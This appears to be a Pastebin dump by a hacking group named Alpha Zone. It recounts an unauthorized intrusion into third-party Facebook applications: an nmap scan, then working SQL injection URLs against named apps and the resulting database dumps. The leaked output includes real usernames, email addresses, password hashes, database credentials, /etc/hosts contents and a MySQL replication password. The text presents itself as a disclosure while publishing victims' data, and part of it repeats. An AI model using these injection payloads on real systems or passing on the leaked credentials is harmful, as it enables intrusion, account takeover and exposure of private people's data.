English translation AlpHa zONE data leak by cybxr :D and LEgit Hacker [0x00] [Introduction] [0x01] [First impressions] [0x02] [Search for bugs] [0x03] [Inj3ct0r Crash Exploit] [0x04] [Conclusion] [0x05] [Greetz] __ __ __ /'__`\ /'__`\ /'__`\ /\ \/\ \ __ _/\ \/\ \/\ \/\ \ \ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \ \ \ \_\ \/> </\ \ \_\ \ \ \_\ \ \ \____//\_/\_\\ \____/\ \____/ \/___/ \//\/_/ \/___/ \/___/ [Introduction] + [En] => In this log file you will read a limited version of the information gathered and provided, since the most important parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system. We did not change the main page, do not sell backup server does not delete files. We have demonstrated the flaw in the system. Start =] .. __ __ _ /'__`\ /'__`\ /' \ /\ \/\ \ __ _/\ \/\ \/\_, \ \ \ \ \ \/\ \/'\ \ \ \ \/_/\ \ \ \ \_\ \/> </\ \ \_\ \ \ \ \ \ \____//\_/\_\\ \____/ \ \_\ \/___/ \//\/_/ \/___/ \/_/ [First impressions] At first glance, FaceBook well protected social network. Scanning FaceBook server did not give nothing interesting ... ) ..> Initiating Parallel DNS resolution of 1 host. Completed Parallel DNS resolution of 1 host. Initiating SYN Stealth Scan Scanning facebook.com (69.63.181.11) [1000 ports] Discovered open port 443/tcp on 69.63.181.11 Discovered open port 80/tcp on 69.63.181.11 Completed SYN Stealth Scan 13.16s elapsed (1000 total ports) Initiating Service scan Scanning 2 services on facebook.com (69.63.181.11) Service scan Timing: About 50.00% done; ETC: Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host) NSE: Script scanning 69.63.181.11. NSE: Starting runlevel 1 (of 1) scan. Initiating NSE at 22:41 Completed NSE at 22:41, 0.38s elapsed NSE: Script Scanning completed. Nmap scan report for facebook.com (69.63.181.11) Host is up (0.17s latency). Hostname facebook.com resolves to 4 IPs. Only scanned 69.63.181.11 rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http 443/tcp open ssl/https go ahead .. =] __ __ ___ /'__`\ /'__`\ /'___`\ /\ \/\ \ __ _/\ \/\ \/\_\ /\ \ \ \ \ \ \/\ \/'\ \ \ \ \/_/// /__ \ \ \_\ \/> </\ \ \_\ \ // /_\ \ \ \____//\_/\_\\ \____//\______/ \/___/ \//\/_/ \/___/ \/_____/ [Search for bugs] We use GoOgle.com request: Facebook+Vulnerability [search] We see a lot of different bug / exploits / etc ... Most see only XSS Vulnerabilities but all this can be found by searching : http://inj3ct0r.com/search All vulnerabilities are closed (Nothing does not work ... Let us once again to GoOgle.com request: site:facebook.com WARNING error =\ fuck... Let us not lose heart) Hackers are not looking for easy ways Visit Facebook.com Let us search bugs in Web Apps. http://www.facebook.com/robots.txt oooooooooooooooooooooooooooo User-agent: * Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php User-agent: Slurp Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php User-agent: msnbot Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php # E-mail webmaster@facebook.com and alex@facebook.com if you're authorized to access these, but getting denied. Sitemap: http://www.facebook.com/sitemap.php 00000000000000000000000000000000 nothing interesting =\ http://apps.facebook.com/tvshowchat/ I looked closely, I noticed links http://apps.facebook.com/tvshowchat/show.php?id=1 habit to check the variable vulnerability... check: http://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r ooooooooooooooooooooooooooo Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28 Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164 and other.... oooooooooooooooooooooooooooo O_o opsss! After sitting for a while, I realized that one of the servers is on MySql. Writing exploits, I got the following: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1 ooooooooooooooooooooooooooo Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 5.0.45-log <= ALERT!!! Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123 and other.... oooooooooooooooooooooooooooo Database : adminclt_testsite Database User : adminclt_13@209.68.2.10 MySQL Version : 5.0.67-log super = ] Now, we just can say that there is SQL Injection Vulnerability http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability] Now we know that there is MySql 5.0.45-log Then let's write another exploit to display tables with information_schema.tables: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1 oooooooooooooooooooooooooooo Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38 Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/ 201 <= ALERT!!! 201 tables! Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123 and other.... oooooooooooooooooooooooooooo http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r] Database : adminclt_testsite Database User : adminclt_13@209.68.2.10 MySQL Version : 5.0.67-log 1) AdCode 2) AdTrack 3) Admin_DataStore 4) Admin_User 5) Challenges 6) ChallengesCompleted 7) Comments 8) ContactEmails 9) Content 10) ContentImages 11) FeaturedTemplate 12) FeaturedWidgets 13) Feeds 14) FolderLinks 15) Folders 16) ForumTopics 17) Log 18) LogDumps 19) Newswire 20) NotificationMessages 21) Notifications 22) Orders 23) OutboundMessages 24) Photos 25) Prizes 26) RawExtLinks 27) RawSessions 28) SessionLengths 29) Sites 30) Subscriptions 31) SurveyMonkeys 32) SystemStatus 33) Templates 34) User 35) UserBlogs 36) UserCollectives 37) UserInfo 38) UserInvites 39) Videos 40) WeeklyScores 41) Widgets 42) cronJobs 43) fbSessions Admin_User 1) id 2) name 3) email 4) password 5) userid 6) ncUid 7) level User 1) userid 2) ncUid 3) name 4) email 5) isAdmin 6) isBlocked 7) votePower 8) remoteStatus 9) isMember 10) isModerator 11) isSponsor 12) isEmailVerified 13) isResearcher 14) acceptRules 15) optInStudy 16) optInEmail 17) optInProfile 18) optInFeed 19) optInSMS 20) dateRegistered 21) eligibility 22) cachedPointTotal 23) cachedPointsEarned 24) cachedPointsEarnedThisWeek 25) cachedPointsEarnedLastWeek 26) cachedStoriesPosted 27) cachedCommentsPosted 28) userLevel http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R] Current Database : signalpa_fbmFundRraise Database User : signalpa_rockaja@localhost MySQL Version : 5.0.85-community DATABASE 1) information_schema 2) signalpa_CelebrityPuzzle 3) signalpa_EBF 4) signalpa_appNotification 5) signalpa_appnetwork 6) signalpa_dailyscriptures 7) signalpa_ebayfeed 8) signalpa_fbmFundRraise 9) signalpa_fbmFundRraisebeta 10) signalpa_netcards 11) signalpa_paypal 12) signalpa_thepuzzle signalpa_fbmFundRraise 1) Campaigns 2) Campaigns_Temp 3) FB_theme 4) IfundDollars 5) Languages 6) Payments 7) Paymentsoops 8) Supporters 9) Users 10) Withdrawals 11) invites 12) invites_copy 13) mp_passwords 14) payment_codes 15) txt_codes 16) valid_servers 17) weeklyBonus Column: Users 1) id 2) name 3) email 4) mobile_no 5) address 6) country 7) password 8) organisation 9) date_created 10) date_updated 11) status 12) facebook_id 13) isFacebookFan 14) verify 15) paypalUse 16) paypalEmail 17) bacUse 18) bacAcc 19) bacName 20) bacLocation 21) bacCountry 22) bacIBAN 23) bacSort_code 24) current_rank 25) new_rank 26) cronjob 27) max_fundraise Column: mp_passwords 1) id 2) password 3) username 4) status 5) number 6) rc 7) referer 8) transID 9) currency 10) transType 11) amount 12) confirmed 13) date signalpa_paypal 1) paypal_cart_info 2) paypal_payment_info 3) paypal_subscription_info [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783: [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023: [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59: Column: paypal_cart_info 1) txnid 2) itemname 3) itemnumber 4) os0 5) on0 6) os1 7) on1 8) quantity 9) invoice 10) custom Column : paypal_payment_info 1) firstname 2) lastname 3) buyer_email 4) street 5) city 6) state 7) zipcode 8) memo 9) itemname 10) itemnumber 11) os0 12) on0 13) os1 14) on1 15) quantity 16) paymentdate 17) paymenttype 18) txnid 19) mc_gross 20) mc_fee 21) paymentstatus 22) pendingreason 23) txntype 24) tax 25) mc_currency 26) reasoncode 27) custom 28) country 29) datecreation http://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R] Current Database : tv Database User : tomkincaid@ps5008.dreamhost.com MySQL Version : 5.0.45-log DATABASES 1) information_schema 2) astro 3) candukincaid 4) cemeteries 5) churchwpdb 6) countdownapp 7) crush 8) dare 9) friendiq 10) giants 11) hookup 12) jauntlet 13) loccus 14) luciacanduwp 15) maps 16) martisor 17) mediax 18) mostlikely 19) music 20) pimpfriends 21) plans 22) politicsapp 23) postergifts 24) posters2 25) projectbasecamp 26) pwnfriends 27) quiz 28) seeall 29) send 30) supporter 31) swapu 32) tomsapps 33) travelbug tab.send 1) app 2) item 3) itemforuser 4) neverblue 5) user Columns user(12454) 1) userid 2) siteid 3) appkey 4) session 5) points 6) added 7) removed Tab. candukincaid 1) wp_comments 2) wp_links 3) wp_options 4) wp_post**** 5) wp_posts 6) wp_px_albumPhotos 7) wp_px_albums 8) wp_px_galleries 9) wp_px_photos 10) wp_px_plugins 11) wp_term_relationships 12) wp_term_taxonomy 13) wp_terms 14) wp_user**** 15) wp_users Column wp_users 1) ID 2) user_login 3) user_pass 4) user_nicename 5) user_email 6) user_url 7) user_registered 8) user_activation_key 9) user_status 10) display_name etc... http://apps.facebook.com/fluff/fluffbook.php?id=[SQL Inj3ct0r] > ~ inj3ct0r_facebook_exploit [ENTER] root:*368C08021F7260A991A9D8121B7D7808C99BBB8A slave_user:*38E277D5CA4EAA7E9A73F8EF80813D7B5859E407 muu:*74A45B921A1A918B18AE9B137396E5A67E006262 monitor:*1840AE2C95804EC69321D1EE33AADFA249817034 maatkit:*9FA5157314A2CF7448A34DA070B5D44E977A1220 http://apps.facebook.com/snowago/area.php?areaid=[SQL Inj3ct0r] Database: affinispac_fb User: affinispac_fb@localhost Version: 5.0.67-community http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Inj3ct0r] >plucky@localhost : facebook : 4.0.13-log etc... =] Next xD Database: thetvdb User: thetvdb@localhost Version: 5.0.51a-24-log [Database]: thetvdb [1]aka_seriesname [2]apiusers [3]banners [4]deletions [5]genres [6]imgstatus [7]languages [8]mirrors [9]networks [10]ratings [11]runtimes [12]seriesactors [13]seriesupdates [14]translation_episodename [15]translation_episodeoverview [16]translation_labels [17]translation_seriesname [18]translation_seriesoverview [19]tvepisodes [20]tvseasons [21]tvseries [22]user_episodes [23]users users: id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites, favorites_displaymode,bannerlimit,banneragreement,active,uniqueid, lastupdatedby_admin,mirrorupdate [userpass] [1] *E92C1AB432D14ACA4D6618A9DFC22810363B114E: [2] *C62726955C4492A6A0CB7319C3928DACEAC4C66D: [3] *887C5DA43E5ACEE73689956A4497C0EDA956E790: [4] *57D6D9BF9F1962C9A006BB451FAF21693624391E: [5] *51121B1DC695FF11A3AEF514AAA0C487611FD98B: [6] 3d801aa532c1cec3ee82d87a99fdf63f [Database]: wiki [24]archive [25]categorylinks [26]externallinks [27]filearchive [28]hitcounter [29]image [30]imagelinks [31]interwiki [32]ipblocks [33]job [34]langlinks [35]logging [36]math [37]objectcache [38]oldimage [39]page [40]page_restrictions [41]pagelinks [42]querycache [43]querycache_info [44]querycachetwo [45]recentchanges [46]redirect [47]revision [48]searchindex [49]site_stats [50]templatelinks [51]text [52]trackbacks [53]transcache [54]user [55]user_groups [56]user_newtalk [57]watchlist user: user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time, user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token, user_email_token_expires,user_registration,user_editcount ['user_name'] : ['user_pass'] [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783: [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023: [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59: [4] AleX: [4] afbb46ebf8c46bfb1f286df87d577f87: [5] Arucard: [5] e94f2b46cbfc681d2346424d7e0e3b3f: [6] AxesDenyd: [6] a998f782d92a8af1c683e6a0e36404e4: [7] Badubo: [7] 5a8920177dbf9abddefe4ff49ebbc67c: [8] Bjarkimg: [8] fd6a9eef25ead144df9592087bb4aec5: [9] BrandonB1218: [9] 62cda59cc492df4f1b1dd4d1365b5ff5: [10] Bsudbury: [10] 827d07956629c37855f3518374821872: [11] Burchard: [11] 4dc05fcbbf5850d27e627d5c4278c4cf: [12] Carla: [12] f41991b4dfd3b494c39751225e1faa29: [13] Click170: [13] 9c38b5f4673372a806f38a4dade456cc: [14] Coco: [14] f6770367b7ca8261a25ea797c24761aa: [15] Corte: [15] 9add39f338de37ce1cf52eaed38b09b2: [16] Crippler: [16] b3d947a82648b2707130f176204cbbfd: [17] Dbkungfu: [17] 0bcb65441f47097f85af79c793c74b95: [18] Deuce911: [18] 0220c76e24b82236675500f1e536a4be: [19] DigitallyBorn: [19] 3e57b721280c35ba66f2a151e19c620b: [20] Divervan10: [20] 1ad65386e69de0896f49c7d0fbaa0cba: [21] Donovan: [21] 03e4e11728c5f16fc936cb4c1d803029: [22] Drkshenronx: [22] ea0b8397ad79d255195780e367ccf026: [23] Emigrating12: [23] c45db536613d53252d00be3dc81cbde0: [24] Emphatic: [24] 3195961b90ea2fe0ac6d12efac8fef19: [25] Eta: [25] f083e5e3fd924342f77e4111df8788e1: [26] Farrism: [26] efef4efa85d73ca0247052687ca9683b: [27] Fiven: [27] 5f6dd4fde7d37c19d1e267618f55d35f: [28] FloVi: [28] 918f77c2a0fe807b3cff8816b8aed8ee: [29] Fritigern: [29] 6a16028b432de68363a20912c31bca03: [30] Furby: [30] 117088a3b9b504ce23c7926c8691fced: [31] Gerph: [31] 294d0c1541c7d892962cb51d540753c1: [32] Hallvar: [32] 4a5da5086b99a7d2f8aef976d364d07c: [33] Happyfrog: [33] 189a598dbdf27734a47c4731c099712d: [34] Hjeffrey: [34] 9b6daf5130c8c1a329a1e6ceff31d448: [35] Hsvjez: [35] fef14c536557ec3b0727246e6f57fadb: [36] Jase81: [36] 9e4c45874be6735b6432e5f060660a46: [37] Jcnetdev: [37] 88a2dc251c777d48189501a79e3d3ffa: [38] Jcpmcdonald: [38] 083968e4c21e6f3ff47c3fefad7c3ff7: [39] Jobba: [39] 699cb250cc53224bf0220d4c8f513a27: [40] Jschek: [40] 9bcf4c5f58764dc4c812b78276d5e412: [41] Juliani1024: [41] c5ea2a208e8e24bd0e3696be6de3bd07: [42] Kakosi: [42] b747252b62d95163a083acf54141bfc6: [43] KelleyCook: [43] b929c4422b9ea29845d1bf46fde7e765: [44] Ken brueck: [44] 1fd5e065ac6587cf351dee24f79def76: [45] Kennykixx: [45] 2a4a9abc742f3508fa37f37e30ed480b: [46] Kermtfrg: [46] cbaef6f6fa9175d419af3395f25bd814: [47] Keydon: [47] e9e984ed67c7e8a67f3406c5506293ec: [48] Kraigspear: [48] ac70640d36b6c9a3fcff3f66687fd3d5: [49] Krisg1984: [49] c78ea770e941c369aa3463c9a74d2f1d: [50] Leecole: [50] 4b3b865528e582b6a4dfc9430aec1ea8: [51] Livemac: [51] 0e36e0b0866b8911216c464fe8440319: [52] Markscore: [52] 5710cbdd3de7e28c7c93eb8e48e266a9: [53] Mcmanuss8: [53] 6262c8e4c7a5bb9d49743c5659d3cc40: [54] Mcoit: [54] 980a1ea1d9fd960208d004fe7ce928fb: [55] Mhale62: [55] df318f477b0c4a3e4f9f3e1ced62f607: [56] Mjh ca: [56] 07223e31ea0a8a617934081475d9ad52: [57] Mreuring: [57] 42472c97f021f725cea7670b078795a1: [58] Nathanlburns: [58] b7e16c89320be1b9860dcb83a082881a: [59] Nekocha: [59] 490c01eea35370bca2c78dce7ab633da: [60] Ngoring: [60] a19430b436a03fdfda8818f8cf486580: [61] Nighthawk92: [61] e8c8cf0eeaec4841c14ede3bcac7e6bb: [62] Null dev: [62] 4e744d982a173d0e1439787da27f022c: [63] Nunovi: [63] 7325e3df990caadddf2423cf96272fed: [64] Obsidianpanther: [64] 53fd2e06ca60a0640cdc617681ace453: [65] PLUCKYHD: [65] 2ac1aa8f8e5341788c9ca7555cc10714: [66] Plambert: [66] 9333604b2eefdcc01debb843373ae492: [67] Polargeek: [67] d0394680e24f75e7dae4e0ca23756161: [68] QyleCoop: [68] af49b70536b2ec2439095947bab36b43: [69] Ramsay: [69] 317192baea92e857e27c96e80c9f6874: [70] Scrooge666: [70] 8498d4d9c8de0300f0b8b3bc789d6731: [71] SeaLawyer: [71] 14dd3e79c6f486319e39ef694cd61a2d: [72] Searlea: [72] 058beaa0d231d457136015119da5aa34: [73] Serberus: [73] ff80d6419f6be5d76dd404fdb256eb3c: [74] Skillzzz: [74] 5f012a10f4eeddacfd2c495f64dbd975: [75] Smakkie: [75] 7143a09106678ec593eec82fcf3e66fd: [76] Smoko: [76] d9a1360bfcdedb3c6f48a37442d58dd8: [77] Smuto: [77] 20ec74ff3d72d42f7593002b0d28a540: [78] Stdly: [78] 4d7b92f616ffe6b420180e859bf245ba: [79] Swiip: [79] 120cc4e935a2c57763709392c5eb6fdf: [80] Szsori: [80] e7fb98c3d405dcc89314996b9c5c6cb2: [81] THe-BiNk: [81] 49e6e431cccf6a77bf6dafa0c96a361a: [82] TheStapler: [82] 7278b0168b8cfb38e64d2b6abe6991fc: [83] Todu: [83] 2173ff53b1fb2bbe3fd49d3d17b6f09f: [84] TommyD: [84] ca62c603dffc337b87a662fa904caa51: [85] TrocdRonel: [85] 318698c02f2f6ea7fef38e17cdaa1ac5: [86] Trol1234: [86] ce07cb60f64f2119a657a1427edc359e: [87] Trolik123456: [87] d392ceb168469aca3b21e1aaeb00f301: [88] Trolik23512: [88] dd16749110a800511459fa4ed655b36c: [89] Trololo23512: [89] 3d508eed899c625389167d2216fae370: [90] Weaverslodge: [90] c2c22a2c65b487915911c1d7f66b85e8: [91] Woodstock123: [91] ba4d45f8c7e9574dd839993a2001d5cd: [92] Wwarby: [92] 04409a510d208e737fa00cd97c712740: [93] Yabba: [93] 4b1febeed49cd185a8efbb8a61f68d74: [94] Zombiigraet33456904: [94] 028785be8488292e8b88137b5fd2c128: [95] Zombiigraet33456906: [95] 4820e4653d77bb3ccab9e7ed25155a5b: [96] Zubbizub1212: [96] ea2e5c44c48ce8f880a0f1627e599868: --------------------------------------------------------------------------------------------------------------------------------------------------- read /etc/hosts 127.0.0.1 localhost localhost.localdomain 192.168.1.167 140696-db2.flufffriends.com 140696-db2 192.168.1.166 140695-db1.flufffriends.com 140695-db1 192.168.1.165 140694-web2.flufffriends.com 140694-web2 192.168.1.164 140693-web1.flufffriends.com 140693-web1 69.63.176.141 api.facebook.com 208.116.17.80 peanutlabs.com ---------------------------------- /etc/my.cnf #SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1 log-bin=/var/lib/mysqllogs/bin-log binlog-do-db=fluff2 expire-logs-days=14 server-id = 5 #master-host=69.63.176.141 #master-user=romis_user #master-password=romis0123 #master-connect-retry=60 replicate-do-db=miserman #log-slave-updates expire_logs_days = 14 I think we found a sufficient number of vulnerabilities! --------------------------- __ __ __ /'__`\ /'__`\ /'__`\ /\ \/\ \ __ _/\ \/\ \/\_\L\ \ \ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_ \ \ \_\ \/> </\ \ \_\ \/\ \L\ \ \ \____//\_/\_\\ \____/\ \____/ \/___/ \//\/_/ \/___/ \/___/ So .. Moving on to the fun friends To avoid Vandal effects of script-kidds I will not give you a link to shell.php, but I enclose you images and some interesting queries =] ..> Exploit start . + . + . + . + . + . + . wp_posts post_password wp_users user_pass done..... WordPress! oO one of the modules installed in facebook is Wordpress! check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1 oooooooooooooooooooooooooooo Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67 3 <= ALERT! Users! =] Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124 oooooooooooooooooooooooooooo ..> Crach_exploit [ENTER] user: admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. cracker: admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:lcandu@yahoo.com lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:lcandu@yahoo.com tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. :tom:tom_kincaid@hotmail.com see request: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1-- http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1-- http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1-- goOd =] Nice Hacking old school xD __ __ __ __ /'__`\ /'__`\/\ \\ \ /\ \/\ \ __ _/\ \/\ \ \ \\ \ \ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_ \ \ \_\ \/> </\ \ \_\ \ \__ ,__\ \ \____//\_/\_\\ \____/\/_/\_\_/ \/___/ \//\/_/ \/___/ \/_/ [Conclusion] There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! (Alpha zone Exploit Database) __ __ ______ /'__`\ /'__`\/\ ___\ /\ \/\ \ __ _/\ \/\ \ \ \__/ \ \ \ \ \/\ \/'\ \ \ \ \ \___``\ \ \ \_\ \/> </\ \ \_\ \/\ \L\ \ \ \____//\_/\_\\ \____/\ \____/ \/___/ \//\/_/ \/___/ \/___/ [Greetz] Greetz all Member Alpha zone GoOd luck Hackers! =] https://www.facebook.com/AlphaZoneOfficial like us ^
Pastebin.com Tools & Applications
iPhone/iPad Windows Firefox Chrome WebOS Android Mac Opera Click.to UNIX WinPhone
create new paste  |  api  |  trends  |  users  |  faq  |  tools  |  privacy  |  contact  |  stats  |  go pro
Follow us: pastebin on facebook  |  pastebin on twitter  |  pastebin in the news
Pastebin v3.1 rendered in: 0.027 seconds
English translation AlpHa zONE data leak by cybxr :D and LEgit Hacker [0x00] [Introduction] [0x01] [First impressions] [0x02] [Search for bugs] [0x03] [Inj3ct0r Crash Exploit] [0x04] [Conclusion] [0x05] [Greetz] __ __ __ /'__`\ /'__`\ /'__`\ /\ \/\ \ __ _/\ \/\ \/\ \/\ \ \ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \ \ \ \_\ \/> </\ \ \_\ \ \ \_\ \ \ \____//\_/\_\\ \____/\ \____/ \/___/ \//\/_/ \/___/ \/___/ [Introduction] + [En] => In this log file you will read a limited version of the information gathered and provided, since the most important parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system. We did not change the main page, do not sell backup server does not delete files. We have demonstrated the flaw in the system. Start =] .. __ __ _ /'__`\ /'__`\ /' \ /\ \/\ \ __ _/\ \/\ \/\_, \ \ \ \ \ \/\ \/'\ \ \ \ \/_/\ \ \ \ \_\ \/> </\ \ \_\ \ \ \ \ \ \____//\_/\_\\ \____/ \ \_\ \/___/ \//\/_/ \/___/ \/_/ [First impressions] At first glance, FaceBook well protected social network. Scanning FaceBook server did not give nothing interesting ... ) ..> Initiating Parallel DNS resolution of 1 host. Completed Parallel DNS resolution of 1 host. Initiating SYN Stealth Scan Scanning facebook.com (69.63.181.11) [1000 ports] Discovered open port 443/tcp on 69.63.181.11 Discovered open port 80/tcp on 69.63.181.11 Completed SYN Stealth Scan 13.16s elapsed (1000 total ports) Initiating Service scan Scanning 2 services on facebook.com (69.63.181.11) Service scan Timing: About 50.00% done; ETC: Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host) NSE: Script scanning 69.63.181.11. NSE: Starting runlevel 1 (of 1) scan. Initiating NSE at 22:41 Completed NSE at 22:41, 0.38s elapsed NSE: Script Scanning completed. Nmap scan report for facebook.com (69.63.181.11) Host is up (0.17s latency). Hostname facebook.com resolves to 4 IPs. Only scanned 69.63.181.11 rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http 443/tcp open ssl/https go ahead .. =] __ __ ___ /'__`\ /'__`\ /'___`\ /\ \/\ \ __ _/\ \/\ \/\_\ /\ \ \ \ \ \ \/\ \/'\ \ \ \ \/_/// /__ \ \ \_\ \/> </\ \ \_\ \ // /_\ \ \ \____//\_/\_\\ \____//\______/ \/___/ \//\/_/ \/___/ \/_____/ [Search for bugs] We use GoOgle.com request: Facebook+Vulnerability [search] We see a lot of different bug / exploits / etc ... Most see only XSS Vulnerabilities but all this can be found by searching : http://inj3ct0r.com/search All vulnerabilities are closed (Nothing does not work ... Let us once again to GoOgle.com request: site:facebook.com WARNING error =\ fuck... Let us not lose heart) Hackers are not looking for easy ways Visit Facebook.com Let us search bugs in Web Apps. http://www.facebook.com/robots.txt oooooooooooooooooooooooooooo User-agent: * Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php User-agent: Slurp Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php User-agent: msnbot Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo.php Disallow: /photo_comments.php Disallow: 